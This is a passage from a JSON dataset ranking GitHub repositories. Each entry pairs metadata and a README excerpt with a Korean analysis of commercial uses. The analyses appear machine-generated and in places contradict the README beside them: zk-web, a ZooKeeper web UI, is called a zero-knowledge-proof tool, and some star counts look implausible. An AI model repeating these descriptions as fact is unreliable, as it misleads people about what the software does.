\n</p>\n\n[![Build Status](https://travis-ci.org/simpletut/Universal-React-Apollo-Registration.svg?branch=master)](https://travis-ci.org/simpletut/Universal-React-Apollo-Registration) [![GitHub](https://img.shields.io/github/license/simpletut/Universal-React-Apollo-Registration.svg)](https://github.com/simpletut/Universal-React-Apollo-Registration/blob/master/LICENSE)\n\n### [Online Demo](https://react-user-registration.herokuapp.com/signup)\n\nAs the Demo is hosted on a free Heroku account, the servers its hosted on enter ‘sleep mode’ when not in use. If you notice a delay, please allow a few seconds for the servers to wake up.\n\n### YouTube Video Tutorials\n\n##### Introduction (Getting started)\n\n<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=11C_TDB3Ijw\" target=\"_blank\">\n\t<img src=\"http://img.youtube.c","composite_score":0.5165,"license_safety_tag":"safe"},{"name":"QiShaoXuan/css_tricks","github_url":"https://github.com/QiShaoXuan/css_tricks","stars":8,"language":"CSS","license":"unknown","abandonment_months":30,"description":"# CSS Tricks 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 디자인 기법들을 모아둔 실용적인 코드 모음으로, 초보자부터 전문가까지 참고할 수 있는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 제작 교육 플랫폼**: 학생들이 CSS 디자인 기법을 배우고 실습하는 교재로 활용\n2. **웹디자인 에이전시의 내부 자산**: 프로젝","readme_excerpt":"<div align=\"center\"><img src=\"https://raw.githubusercontent.com/QiShaoXuan/css_tricks/master/logo.png\"></div>\n\n<a href='https://github.com/QiShaoXuan/css_tricks/blob/master/README_en.md'>English</a>\n\n## 关于\n\n- 总结一些常用的 CSS 样式\n- 记录一些 CSS 的新属性和一点奇技淫巧\n- 在“动”部分下有些动画并不是 CSS 效果，因为没有地方放置，所以暂时寄存在这里\n\n尽量少说废话，代码简单易用，方便复制\n\n> talk is cheap show me the code\n\n## 快速开始\n\n- Clone the `https://github.com/QiShaoXuan/css_tricks.git`\n- Install package `npm install`\n- Development run `npm run docs:dev`\n- Open `http://localhost:8080` in your browser.\n\n## 内容 \n\n### 工具\n- <a href=\"https://qishaoxuan.github.io/css_tricks/createTriangle/\">三角形生成器</a>\n- <a href=\"https://qishaoxuan.github.io/css_tricks/sector/\">扇形生成器</a>\n- <a href=\"https://qishaoxuan.github.io/css_tricks/hollowOut/\"> 卡券生成器</a>\n- <a href=\"https://qishaoxuan.github.io/css_tricks/smallFont/\">小于 12px 的文字生成器</a>\n\n### 属性\n- <a href=\"https://qishaoxuan.github.io/css_tricks/filter/\">滤镜 filter</a>\n- <a href=\"https://qishaoxuan.github.io/css_tricks/flexbox/\">flexbo","composite_score":0.5164,"license_safety_tag":"unknown"},{"name":"mobxjs/mobx-react-todomvc","github_url":"https://github.com/mobxjs/mobx-react-todomvc","stars":499,"language":"JavaScript","license":"MIT","abandonment_months":56,"description":"# mobxjs/mobx-react-todomvc 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션에서 데이터 변화를 효율적으로 관리하는 오픈소스 기술로, 다양한 기업 소프트웨어에 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리, CRM 등 복잡한 데이터를 다루는 클라우드 서비스의 개발 기술로 활용\n2. **내부 ","readme_excerpt":"# React + MobX TodoMVC Example\n\nThis repository provides a reference implementation of the [TodoMVC](http://todomvc.com) application written using [MobX](https://github.com/mobxjs/mobx), [React](https://facebook.github.io/react) JSX and ES6.\n\n## Running the example\n\n```\nnpm install\nnpm start\nopen http://localhost:3000\n```\n\nThe example requires node 4.0 or higher\n\n![TodoMVC](devtools.gif)\n\n## Changing the example\n\nIf you are new to MobX, take a look at the [ten minutes, interactive introduction](https://mobxjs.github.io/mobx/getting-started.html) to MobX and React. MobX provides a refreshing way to manage your app state by combining mutable data structures with transparent reactive programming.\n\nThe state and actions of this app are defined in two stores; `todoModel` and `viewModel`.\nThis is not necessary but it provides a nice separation of concerns between data that effects the domain of the application and data that affects the user interface of the application.\nThis is a useful dist","composite_score":0.5164,"license_safety_tag":"safe"},{"name":"Zhao-github/ApiAdmin","github_url":"https://github.com/Zhao-github/ApiAdmin","stars":499,"language":"PHP","license":"MIT","abandonment_months":56,"description":"# ApiAdmin 상용화 분석\n\n## 왜 보물인가\n복잡한 API를 간단한 웹 화면에서 관리할 수 있어, 기업의 개발 비용과 시간을 크게 줄일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 기업 고객에게 API 관리 서비스를 월 구독료로 판매하는 웹사이트\n2. **내부 업무 도구**: 중소 IT회사가 자신들의 소프트웨어","readme_excerpt":"> 站在巨人的肩膀上，并不是高的表现，反而使自己变得渺小~只有吸收了巨人的营养，茁壮自己才是真正的高大！ --笔者\n\n\n# ApiAdmin\n[![ApiAdmin](https://img.shields.io/hexpm/l/plug.svg)](http://www.apiadmin.org/)\n[![ApiAdmin](https://img.shields.io/badge/release-5.0.0-blue.svg)](http://www.apiadmin.org/)\n[![ApiAdmin](https://img.shields.io/badge/build-passing-brightgreen.svg)](http://www.apiadmin.org/)\n[![ApiAdmin](https://img.shields.io/badge/ApiAdmin-5.0.0-brightgreen.svg)](http://www.apiadmin.org/)\n\n## 前端页面\nApiAdmin5.0是一个前后端完全分离的项目，前端采用Vue构建，如需要可视化配置的请移步：[ApiAdmin-WEB](https://gitee.com/apiadmin/ApiAdmin-WEB)\n\n## 快速安装\n\n> 第一步：安装代码\n\n```\ncomposer create-project apiadmin/apiadmin\n```\n```\n你也可以：先获取基础代码 git clone https://gitee.com/apiadmin/ApiAdmin.git   再使用composer安装 composer install\n```\n\n> 第二步：检测环境以及配置数据库\n\n```\nphp think apiadmin:install\n```\n\n> 第三步：完成数据迁移\n\n```\nphp think migrate:run\n\n* 如出现报错：There are no commands defined in the \"migrate\" namespace.\n* 请先更新下think版本：composer update topthink/framework\n* 再执行：php think migrate:run\n* 特别鸣谢：@孙晔华\n```\n\n> 第四步：构","composite_score":0.5161,"license_safety_tag":"safe"},{"name":"lan-tianxiang/JS_TOOL","github_url":"https://github.com/lan-tianxiang/JS_TOOL","stars":25,"language":"JavaScript","license":"unknown","abandonment_months":57,"description":"# JS_TOOL 저장소 분석\n\n## 왜 보물인가\n웹 개발에서 자주 사용하는 반복적인 작업들을 자동으로 처리해주는 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발 플랫폼에서 이 도구들을 기본 기능으로 내장하여 사용자들의 개발 시간 단축\n2. **내부 업무 도구**: 회사 내 개발팀이 ","readme_excerpt":"<!--\n[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=lan-tianxiang&show_icons=true&theme=radical&repo=jd_shell)](https://github.com/lan-tianxiang/js_tool)\n-->\n\n### 旧版暂停更新，忙不过来  答疑交流QQ群967451175\nA1版（新版） https://github.com/lan-tianxiang/js_tool\n\n\n<p align=\"center\">\n <img width=\"100px\" src=\"https://res.cloudinary.com/anuraghazra/image/upload/v1594908242/logo_ccswme.svg\" align=\"center\" alt=\"GitHub Readme Stats\" />\n <h2 align=\"center\">JS SHELL</h2>\n <p align=\"center\">自动化一键完成JS库管理</p>\n</p>\n  <p align=\"center\">\n    <a href=\"https://github.com/lan-tianxiang/js_tool/blob/master/LICENSE\"><img alt=\"GitHub\" src=\"https://img.shields.io/github/license/lan-tianxiang/js_tool.svg?label=License&style=for-the-badge\"></a>\n    <a href=\"https://github.com/lan-tianxiang/js_tool/issues\"><img alt=\"Issues\" src=\"https://img.shields.io/github/issues/lan-tianxiang/js_tool?color=0088ff&style=for-the-badge\" /></a>\n    <a href=\"https://github.com/lan-tianxiang/js_tool/stargazers\"><img alt=\"Gi","composite_score":0.5161,"license_safety_tag":"unknown"},{"name":"writingink/wink","github_url":"https://github.com/writingink/wink","stars":5,"language":"Vue","license":"MIT","abandonment_months":27,"description":"# writingink/wink 보물 분석\n\n## 왜 보물인가\n글쓰기 작업을 돕는 간단하고 실용적인 도구로, 개인 블로거부터 전문 작가까지 폭넓게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 온라인 글쓰기 플랫폼으로 개인 사용자에게 제공\n- **내부 업무 도구**: 기업의 마케팅팀이 보도자료, 블로그 글, SNS ","readme_excerpt":"<p align=\"center\"><img src=\"/art/header.png?1\" alt=\"wink logo\"></p>\n\nWink adds a nice UI where you can manage a publication of any size with posts, pages, tags, and authors.\n\nYou can add photos, code blocks, featured images, social media & SEO attributes, embedded HTML (YouTube Videos, Embedded Podcasts Episodes, Tweets, ...), and markdown!\n\nWink is used to manage the [official Laravel blog](https://blog.laravel.com), [divinglaravel.com](https://divinglaravel.com), and many more.\n\nDark & Light modes available so everyone is happy 😁\n\n## Installation\n\nWink uses a separate database connection and authentication system so that you don't have to modify any of your project code.\n\nTo install Wink, run these commands in the root of your Laravel app:\n\n```sh\ncomposer require themsaid/wink\nphp artisan wink:install\nphp artisan storage:link\n```\n\n**Configure the database connection** wink is going to be using in `config/wink.php`. Then run:\n\n```sh\nphp artisan wink:migrate\n```\n\nHead to `yourproject.t","composite_score":0.516,"license_safety_tag":"safe"},{"name":"qiuxiafei/zk-web","github_url":"https://github.com/qiuxiafei/zk-web","stars":499,"language":"Clojure","license":"unknown","abandonment_months":65,"description":"# qiuxiafei/zk-web 상용화 분석\n\n## 왜 보물인가\n영지식 증명(Zero Knowledge Proof) 기술을 웹에서 간단하게 사용할 수 있게 만든 도구로, 개인정보를 노출하지 않으면서도 본인임을 증명할 수 있는 보안 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 은행이나 금융사가 고객 신원 확인 시 개인정보를 수집하지 ","readme_excerpt":"# zk-web\n\nzk-web is a Web UI of [Zookeeper](http://zookeeper.apache.org), just making it easier to use. Sometimes I really get tired of the command line.\nzk-web is written in [clojure](http://clojure.org) with [noir](http://webnoir.org) and [boostrap](http://twitter.github.com/bootstrap/). Currently there're just less than 450 lines clojure code at all. Clojure is really so simple and so elegent!\n\n## Usage\n\nTo use zk-web, you need [leiningen](https://github.com/technomancy/leiningen) and git currentlly. (And I'll make a stand-alone package later).\nRun the following command:\n\n```bash\ngit clone git://github.com/qiuxiafei/zk-web.git\ncd zk-web\nlein deps # run this if you're using lein 1.x\nlein run\n```\nMeet with zk-web at [http://localhost:8080](http://localhost:8080)! I'am sure it's super easy!\n\n## Package UberJar\n\n```bash\ncd zk-web\nlein uberjar\n```\n## Create debian package\n\n```bash\ndocker build -t zk-web .\ndocker run -it --rm -v $(pwd):/usr/src/app zk-web /bin/bash /usr/src/app/build-pkg-","composite_score":0.516,"license_safety_tag":"unknown"},{"name":"rancher/k3os","github_url":"https://github.com/rancher/k3os","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":30,"description":"# K3OS 저장소 분석\n\n## 왜 보물인가\n경량 리눅스 운영체제로 저사양 컴퓨터나 서버에서도 빠르게 실행할 수 있어, 작은 규모의 IT 인프라를 관리하는 조직들에게 비용 절감 솔루션을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 저비용 클라우드 인프라 제공 플랫폼으로 스타트업과 소상공인 대상 컴퓨팅 자원 임대 서비스\n2. **내부","readme_excerpt":"\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/rancher/k3os)\n![GitHub release (latest SemVer including pre-releases)](https://img.shields.io/github/v/release/rancher/k3os?include_prereleases&label=release&sort=semver)\n\n\n# Project Status\n\n**k3os is no longer maintained and has been superceeded by [Elemental] (https://elemental.docs.rancher.com/).\nPlease do not submit PRs or issues to this repo.**\n\n# k3OS\n\nk3OS is a Linux distribution designed to remove as much OS maintenance\nas possible in a Kubernetes cluster. It is specifically designed to only\nhave what is needed to run [k3s](https://github.com/rancher/k3s). Additionally\nthe OS is designed to be managed by `kubectl` once a cluster is bootstrapped.\nNodes only need to join a cluster and then all aspects of the OS can be managed\nfrom Kubernetes. Both k3OS and k3s upgrades are handled by the k3OS operator.\n\n1. [Quick Start](#quick-start)\n1. [Design](#design)\n1. [Installation](#installation)\n1. [Configuration","composite_score":0.5159,"license_safety_tag":"safe"},{"name":"fuzhengwei/interview","github_url":"https://github.com/fuzhengwei/interview","stars":5,"language":"Java","license":"unknown","abandonment_months":40,"description":"# fuzhengwei/interview 프로젝트 분석\n\n## 왜 보물인가\n취업 준비생들이 면접 질문과 답변을 체계적으로 학습할 수 있는 정리된 자료 모음이다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 개발자 취업 준비 강좌와 함께 면접 문제 풀이 콘텐츠를 유료 제공\n2. **취업 준비 앱**: 면접 질문을 매일 추천해주는 모바일 앱의 ","readme_excerpt":"# Java 面经手册 • 拿大厂Offer\n\n> **作者：** 小傅哥，Java Developer，[:pencil2: 虫洞 · 科技栈，作者](https://bugstack.cn)，[:trophy: CSDN 博客专家](https://bugstack.blog.csdn.net)，[:memo: 关于我](https://bugstack.cn/about.html)\n\n> 一线互联网java 工程师、架构师，开发过交易&营销、写过运营&活动、设计过中间件也倒腾过中继器、IO板卡。不只是写Java语言，也搞过C#、PHP，是一个技术活跃的折腾者。\n\n<br/>\n<div align=\"center\">\n    <a href=\"https://bugstack.cn\" style=\"text-decoration:none\"><img src=\"https://bugstack.cn/assets/images/icon.svg\" width=\"128px\"></a>\n</div>\n<br/>  \n\n<div align=\"center\">\n<a href=\"https://github.com/fuzhengwei/CodeGuide\"><img src=\"https://badgen.net/github/stars/fuzhengwei/CodeGuide?icon=github&color=4ab8a1\"></a>\n<a href=\"https://github.com/fuzhengwei/CodeGuide\"><img src=\"https://badgen.net/github/forks/fuzhengwei/CodeGuide?icon=github&color=4ab8a1\"></a>\n<a href=\"https://bugstack.cn\" target=\"_blank\"><img src=\"https://bugstack.cn/assets/images/onlinebook.svg\"></a>\n<a href=\"https://bugstack.cn/assets/images/qrcode.png?x-oss-process=style/may\"><img src=\"https://itstack.org/_med","composite_score":0.5159,"license_safety_tag":"unknown"},{"name":"xuannianz/EfficientDet","github_url":"https://github.com/xuannianz/EfficientDet","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":32,"description":"# EfficientDet 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 자동으로 찾아내는 기술인데, 처리 속도가 빠르면서도 정확도가 높아 실제 비즈니스에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 분석 SaaS**\n- 편의점, 은행의 CCTV 영상을 실시간으로 분석하여 위험 상황(소매치기, 이상행동) 자동 감지 및","readme_excerpt":"# EfficientDet\nThis is an implementation of [EfficientDet](https://arxiv.org/pdf/1911.09070.pdf) for object detection on Keras and Tensorflow. \nThe project is based on the official implementation [google/automl](https://github.com/google/automl), [fizyr/keras-retinanet](https://github.com/fizyr/keras-retinanet)\nand the [qubvel/efficientnet](https://github.com/qubvel/efficientnet). \n\n## About pretrained weights\n* The pretrained EfficientNet weights on imagenet are downloaded from [Callidior/keras-applications/releases](https://github.com/Callidior/keras-applications/releases)\n* The pretrained EfficientDet weights on coco are converted from the official release [google/automl](https://github.com/google/automl).\n\nThanks for their hard work.\nThis project is released under the Apache License. Please take their licenses into consideration too when use this project.\n\n**Updates**\n- [03/21/2020] Synchronize with the official implementation. [google/automl](https://github.com/google/automl)\n- [0","composite_score":0.5158,"license_safety_tag":"safe"},{"name":"pojiezhiyuanjun/freev2","github_url":"https://github.com/pojiezhiyuanjun/freev2","stars":6,"language":"HTML","license":"unknown","abandonment_months":40,"description":"# freev2 저장소 분석\n\n## 왜 보물인가\nV2Ray라는 인터넷 통신 도구를 무료로 쉽게 사용할 수 있게 만든 프로젝트로, 온라인 개인정보 보호가 필요한 사람들에게 실질적인 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인정보 보호 SaaS**: 월정액 구독 서비스로 안전한 인터넷 접속 환경 제공\n2. **기업 내부 도구**: 직원들의","readme_excerpt":"","composite_score":0.5158,"license_safety_tag":"unknown"},{"name":"0voice/k8s_awesome_document","github_url":"https://github.com/0voice/k8s_awesome_document","stars":8,"language":"","license":"unknown","abandonment_months":25,"description":"# 0voice/k8s_awesome_document 분석 보고서\n\n## 왜 보물인가\n쿠버네티스(대규모 시스템을 관리하는 필수 기술)의 모든 학습 자료와 가이드를 한곳에 정리한 백과사전으로, 기업의 디지털 전환에 필수적인 지식을 체계적으로 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 SaaS**: 직원 기술 교육이 필요한 회사들에게 월 구독형","readme_excerpt":"# 😀😀😀【2021年新鲜出炉】K8s（Kubernetes）的工程师资料合辑，书籍推荐，面试题，精选文章，开源项目，PPT，视频，大厂资料。[@云原生](https://baike.baidu.com/item/%E4%BA%91%E5%8E%9F%E7%94%9F/53770166)[@Docker](https://www.docker.com/)\n\n<br>  \n\n<div align=center>\n  \n<img width=\"70%\" height=\"70%\" src=\"https://user-images.githubusercontent.com/87457873/138632184-e1f090e6-b95b-4b19-ab78-195bc9e46af4.png\"/>\n  \n## ————【Docker容器化技术优秀“管家”】\n  \n<br>  \n  \n</div>\n\n# 🎯北斗导航定位系统（目录）\n\n### [@ 认识K8s](https://github.com/0voice/k8s_awesome_document#%E8%B7%9F%E5%A4%A7%E5%8E%82%E4%B8%80%E8%B5%B7%E8%AE%A4%E8%AF%86k8s)\n### [@ 干货铺](https://github.com/0voice/k8s_awesome_document/blob/main/README.md#%E5%B9%B2%E8%B4%A7%E9%93%BA%E6%AC%A2%E8%BF%8E%E5%A4%A7%E5%AE%B6lssues)\n### [@公众号推荐](https://github.com/0voice/k8s_awesome_document/blob/main/README.md#%E5%85%AC%E4%BC%97%E5%8F%B7%E6%8E%A8%E8%8D%90%E6%AC%A2%E8%BF%8E%E5%A4%A7%E5%AE%B6lssues)\n### [@ 推荐书籍](https://github.com/0voice/k8s_awesome_document#%E7%94%B5%E5%AD%90%E4%B9%A6%E7%B1%8D)\n### [@ 精选文章](https://github.com/0voi","composite_score":0.5157,"license_safety_tag":"unknown"},{"name":"gameknife/gkEngine","github_url":"https://github.com/gameknife/gkEngine","stars":499,"language":"C++","license":"unknown","abandonment_months":92,"description":"# gkEngine 분석 보고서\n\n## 왜 보물인가\n게임 제작에 필요한 핵심 엔진을 직접 만들 수 있는 오픈소스 도구로, 게임 개발사들이 비용 없이 고급 기술을 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 SaaS 플랫폼**\n- 클라우드 기반 게임 제작 도구로 구독료 모델 운영 (월 구독 제공)\n\n**2. 게임 엔진 라이선스 판매*","readme_excerpt":"![placeholder](https://raw.githubusercontent.com/gameknife/gameknife.github.io/master/images/gkengine_logo.png \"logo\")\n========\n\n| OSX | WIN |\n| --- | --- |\n|[![Build Status](https://travis-ci.org/gameknife/gkEngine.svg?branch=master)](https://travis-ci.org/gameknife/gkEngine)|![https://ci.appveyor.com/api/projects/status/32r7s2skrgm9ubva?svg=true](https://ci.appveyor.com/api/projects/status/github/gameknife/gkengine?branch=master&svg=true)|\n\n<br>\n\n部署，编译等问题请先在[wiki](https://github.com/gameknife/gkEngine/wiki)和[issue  |   question](https://github.com/gameknife/gkEngine/labels/question)中查阅。\n\n欢迎加入gkENGINE贡献者交流QQ群: [289525937](http://jq.qq.com/?_wv=1027&k=fSv16p)\n\n<br>\n\ngkENGINE's runtime Quick Start\n---\n\n1. 你需要安装git, cmake控制台环境, windows安装有visual studio, mac安装有xcode, 拥有良好的github网络访问环境\n1. 拉取submodule\n```\ngit submodule update --init\n```\n3. 构筑基础引擎环境\n```\n.\\auto_make_env.bat (windows) | sh ./auto_make_env.sh (mac)\n```\n4. 通过cmake，生成你本机的编译环境\n```\n.\\auto_cmake.bat -win64(windows) | sh ./auto_cmake.","composite_score":0.5157,"license_safety_tag":"unknown"},{"name":"cgoldsby/LoginCritter","github_url":"https://github.com/cgoldsby/LoginCritter","stars":42,"language":"Swift","license":"MIT","abandonment_months":78,"description":"# LoginCritter 분석 보고서\n\n## 왜 보물인가\n로그인 화면을 귀여운 캐릭터로 꾸며서 사용자 경험을 재미있게 만드는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션의 로그인 페이지를 브랜드에 맞게 커스터마이징하여 제공\n2. **내부 업무 도구**: 직원들이 사용하는 회사 시스템의 로그인 화면을 친근하","readme_excerpt":"# Login Critter\n> An animated avatar that responds to text fields interactions 🐻\n\n![Demo gif](/assets/demo.gif)\n\nInspired by the amazing work done by other designers and developers, specifically Darin Senneff's [amazing work](https://dribbble.com/shots/4249163-Animated-login-form-avatar?utm_campaign=iOS%2BDev%2BWeekly&utm_medium=web&utm_source=iOS%2BDev%2BWeekly%2BIssue%2B349). 🎩🌟 I wanted to try and create a similar animated \"Login avatar\" in Swift.\n\nThe Login Critter uses several `UIPropertyAnimator`. The head rotation is controlled by updating the `fractionComplete` property for an animator. As the user types, the animator's fraction complete is calculated by `text width / text field width`.\n\n## Avatar Assets\nThe Login Critter assets are broken down in to \"Parts\": body, head, eyes, ears, nose, muzzle, etc. Each \"Part\" can be individually animated. They are just vector PDFs because I wanted to focus on the animations and not worry about creating shapes programmatically.\n\nI used Affin","composite_score":0.5157,"license_safety_tag":"safe"},{"name":"apex/up","github_url":"https://github.com/apex/up","stars":7,"language":"Go","license":"MIT","abandonment_months":27,"description":"# apex/up 상용화 분석\n\n## 왜 보물인가\n개발자들이 코드를 더 빠르고 효율적으로 배포할 수 있게 도와주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 많은 스타트업을 위해 \"자동 배포 관리 플랫폼\"으로 월 구독 서비스 제공\n2. **내부 업무 도구**: 중소 IT회사의 개발팀이 자체 배포 프로세스를 자동화","readme_excerpt":"![](assets/title.png)\n\nUp deploys infinitely scalable serverless apps, APIs, and static websites in seconds, so you can get back to working on what makes your product unique.\n\nWith Up there's no need to worry about managing or scaling machines, paying for idle servers, worrying about logging infrastructure or alerting. Just deploy your app with `$ up` and you're done!\n\nUse the free OSS version, or subscribe to [Up Pro](#pro-features) for a small monthly fee for unlimited use within your company, there is no additional cost per team-member or application. Deploy dozens or even hundreds of applications for pennies thanks to AWS Lambda's cost effective nature.\n\n## About\n\nUp focuses on deploying \"vanilla\" HTTP servers so there's nothing new to learn, just develop with your favorite existing frameworks such as Express, Koa, Django, Golang net/http or others.\n\nUp currently supports Node.js, Golang, Python, Java, Crystal, Clojure and static sites out of the box. Up is platform-agnostic, suppo","composite_score":0.5157,"license_safety_tag":"safe"},{"name":"bitwarden/desktop","github_url":"https://github.com/bitwarden/desktop","stars":5,"language":"TypeScript","license":"GPL-3.0","abandonment_months":47,"description":"# Bitwarden Desktop 분석 보고서\n\n## 왜 보물인가\n비트워든은 비밀번호를 안전하게 관리해주는 금고 같은 프로그램으로, 누구나 자신의 온라인 계정을 쉽게 보호할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 비밀번호 관리 SaaS**: 회사의 모든 직원이 안전하게 계정 정보를 공유하고 관리하는 클라우드 서비스\n2. **금융·의료기관","readme_excerpt":"[![Github Workflow build on master](https://github.com/bitwarden/desktop/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/bitwarden/desktop/actions/workflows/build.yml?query=branch:master)\n[![Crowdin](https://d322cqt584bo4o.cloudfront.net/bitwarden-desktop/localized.svg)](https://crowdin.com/project/bitwarden-desktop)\n[![Join the chat at https://gitter.im/bitwarden/Lobby](https://badges.gitter.im/bitwarden/Lobby.svg)](https://gitter.im/bitwarden/Lobby)\n\n> **Archived**\n>\n> This repository is archived, please go to https://github.com/bitwarden/clients for future development.\n\n# Bitwarden Desktop Application\n\n[![Platforms](https://imgur.com/SLv9paA.png \"Windows, macOS, and Linux\")](https://bitwarden.com/download/)\n\nThe Bitwarden desktop app is written using Electron and Angular. The application installs on Windows, macOS, and Linux distributions.\n\n![Desktop Vault](https://github.com/bitwarden/brand/blob/f09f2fa594c8a020c315296074f18ce0a7b3f171/screenshots/desktop-m","composite_score":0.5157,"license_safety_tag":"restricted"},{"name":"mozilla/notes","github_url":"https://github.com/mozilla/notes","stars":500,"language":"HTML","license":"MPL-2.0","abandonment_months":69,"description":"# mozilla/notes 보물 분석\n\n## 왜 보물인가\nMozilla가 만든 믿을 수 있는 노트 앱으로, 500명 이상의 개발자들이 관심을 두고 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **개인용 노트 SaaS**: 암호화된 개인 메모 저장 및 동기화 서비스로 월 구독 판매\n2. **회사 업무용 도구**: 직원들의 회의록, 업무 일","readme_excerpt":"# Firefox Notes\n\nA notepad for Firefox\n\n[![CircleCI](https://circleci.com/gh/mozilla/notes/tree/master.svg?style=svg)](https://circleci.com/gh/mozilla/notes/tree/master)\n[![Available on Test Pilot](https://img.shields.io/badge/available_on-Test_Pilot-0996F8.svg)](https://testpilot.firefox.com/experiments/notes)\n> Discussion Forum: [https://discourse.mozilla.org/c/archives/test-pilot](https://discourse.mozilla.org/c/archives/test-pilot)\n\n\n## Releases\n\nThe releases are packaged by CircleCI for [Android](https://app.circleci.com/pipelines/github/mozilla/notes/20/workflows/239f8590-cfae-491b-9db7-30971c73fd9a/jobs/3294/artifacts) and the [WebExtension](https://app.circleci.com/pipelines/github/mozilla/notes/20/workflows/239f8590-cfae-491b-9db7-30971c73fd9a/jobs/3292/artifacts).\n\n## Contribute\n\n* Step 0: If you plan on sending a pull-request, you should fork the repository.\n* Step 1: Clone the [notes](https://github.com/mozilla/notes) repository or your fork.\n```\ngit clone https://github.co","composite_score":0.5156,"license_safety_tag":"unknown"},{"name":"project-serum/spl-token-wallet","github_url":"https://github.com/project-serum/spl-token-wallet","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":42,"description":"# spl-token-wallet 분석\n\n## 왜 보물인가\n암호화폐 지갑을 직접 만들 수 있는 기초 설계도이므로, 금융 기관이나 암호화폐 거래소가 자체 지갑을 구축할 때 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 중소 암호화폐 거래소가 이 코드를 기반으로 자신의 거래 플랫폼에 통합된 지갑 기능을 제공하","readme_excerpt":"# SPL Token Wallet\n\nNote. This repository is used as a developer tool. Non security related issues and PRs will not be actively supported. For a wallet, it's recommended to use [Backpack](https://backpack.app/download).\n\nExample Solana wallet with support for [SPL tokens](https://spl.solana.com/token) and Serum integration.\n\nSee [sollet.io](https://www.sollet.io) or the [Sollet Chrome Extension](https://chrome.google.com/webstore/detail/sollet/fhmfendgdocmcbmfikdcogofphimnkno) for a demo.\n\nWallet keys are stored in `localStorage`, optionally encrypted by a password.\n\nRun `yarn start` to start a development server or `yarn build` to create a production build that can be served by a static file server.\n\nSee the [Create React App documentation](https://facebook.github.io/create-react-app/docs/getting-started) for other commands and options.\n","composite_score":0.5156,"license_safety_tag":"safe"},{"name":"johnpapa/gulp-patterns","github_url":"https://github.com/johnpapa/gulp-patterns","stars":500,"language":"JavaScript","license":"unknown","abandonment_months":92,"description":"# johnpapa/gulp-patterns 분석\n\n## 왜 보물인가\n웹 개발자들이 반복적인 작업을 자동화하는 방법을 배울 수 있는 실전 예제 모음집입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 초급 개발자 대상 자동화 강좌 구성\n2. **웹 에이전시의 내부 업무 도구**: 프로젝트마다 반복되는 파일 처리 과정 자동화\n3. **개발","readme_excerpt":"# gulp-patterns\nYou've built your JavaScript application but how do you automate testing, code analysis, running it locally or deploying it? These redundant tasks can consume valuable time and resources. Stop working so hard and take advantage of JavaScript task automation using Gulp to streamline these tasks and give you back more time in the day. Studying this repo can help clarify how Gulp works, jump-start task automation with Gulp, find and resolve issues faster, and be a more productive.\n\n[![Build Status](https://travis-ci.org/johnpapa/gulp-patterns.svg?branch=master)](https://travis-ci.org/johnpapa/gulp-patterns)\n\n[![Codeship Status for johnpapa/gulp-patterns](https://codeship.io/projects/46913320-7139-0132-3214-62f5102d8589/status)](https://codeship.io/projects/54583)\n\n## Requirements\n\n- Install Node\n    - on OSX install [home brew](http://brew.sh/) and type `brew install node`\n    - on Windows install [chocolatey](https://chocolatey.org/)\n        - More tips on [Windows with n","composite_score":0.5155,"license_safety_tag":"unknown"},{"name":"pycassa/pycassa","github_url":"https://github.com/pycassa/pycassa","stars":499,"language":"Python","license":"NOASSERTION","abandonment_months":85,"description":"# pycassa 저장소 분석\n\n## 왜 보물인가\n대규모 데이터를 빠르게 저장하고 찾는 데이터베이스 기술로, 많은 사용자 정보를 동시에 다루는 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 수백만 명의 사용자 데이터를 실시간으로 관리하는 소셜 미디어, 게임, 메신저 플랫폼\n- **내부 업무 도구**: 대규모 기업의 고객 거래","readme_excerpt":"pycassa\n=======\n\n[![Build Status](https://secure.travis-ci.org/pycassa/pycassa.png?branch=master)](http://travis-ci.org/pycassa/pycassa)\n\npycassa is a Thrift-based python client library for [Apache Cassandra](http://cassandra.apache.org)\n\n**pycassa does not support CQL** or Cassandra's native protocol, which are a\nreplacement for the Thrift interface that pycassa is based on. If you are\nstarting a new project, **it is highly recommended that you use the newer**\n[DataStax python driver](https://github.com/datastax/python-driver) instead\nof pycassa.\n\npycassa is open source under the [MIT license](http://www.opensource.org/licenses/mit-license.php).\n\nDocumentation\n-------------\n\nDocumentation can be found here:\n\n[http://pycassa.github.com/pycassa/](http://pycassa.github.com/pycassa/)\n\nIt includes [installation instructions](http://pycassa.github.com/pycassa/installation.html),\na 